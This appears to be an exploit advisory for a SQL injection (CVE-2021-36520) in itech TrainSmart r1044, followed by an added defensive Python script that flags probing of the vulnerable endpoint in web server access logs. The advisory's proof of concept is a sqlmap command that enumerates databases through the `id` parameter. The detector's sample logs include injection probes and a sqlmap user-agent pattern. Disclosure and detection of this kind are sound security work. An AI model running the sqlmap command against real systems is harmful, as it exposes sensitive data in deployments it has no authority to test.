## https://sploitus.com/exploit?id=PACKETSTORM:171731
# Exploit Title: itech TrainSmart r1044 - SQL injection  
# Date: 03.02.2023  
# Exploit Author: Adrian Bondocea  
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/  
# Version: TrainSmart r1044  
# Tested on: Linux  
# CVE : CVE-2021-36520  
  
A SQL injection vulnerability in itech TrainSmart r1044 allows remote  
attackers to view sensitive information via a crafted command using sqlmap.  
  
PoC:  
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs
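
For defenders, a way to look for probing of this endpoint in web server access logs. This is an added example, not part of the original advisory or of TrainSmart; it assumes Combined Log Format, assumes a legitimate `id` is a single integer (as in the PoC's `id=1`), and uses constructed sample log lines.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/evaluation/assign-evaluation"  # path from the advisory's PoC
PARAM = "id"                                # parameter from the advisory's PoC

# Combined Log Format; only client IP, request target and user agent are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2023:10:00:00 +0000] "GET /evaluation/assign-evaluation?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Feb/2023:10:00:05 +0000] "GET //evaluation/assign-evaluation?id=1%27 HTTP/1.1" 500 120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.8 - - [03/Feb/2023:10:00:06 +0000] "GET /evaluation/assign-evaluation?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.11 - - [03/Feb/2023:10:00:09 +0000] "GET /index?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def suspicious_requests(lines):
    """Return (client_ip, reasons) for flagged requests to ENDPOINT."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read the PoC's leading "//" as a host.
        path, _, query = m["target"].partition("?")
        if re.sub(r"/{2,}", "/", path).rstrip("/") != ENDPOINT:
            continue
        values = parse_qs(query, keep_blank_values=True).get(PARAM, [])
        reasons = []
        # Assumption: a legitimate id is one ASCII integer, as in the PoC's id=1.
        if len(values) != 1 or not re.fullmatch(r"[0-9]+", values[0]):
            reasons.append("id is not a single integer")
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user agent")
        if reasons:
            hits.append((m["ip"], ", ".join(reasons)))
    return hits

if __name__ == "__main__":
    for ip, why in suspicious_requests(SAMPLE_LOG):
        print(ip, why)
```

The user-agent match is a weak signal because the header is client-controlled, and access logs of this kind record only the query string, so parameters sent in a request body are not covered.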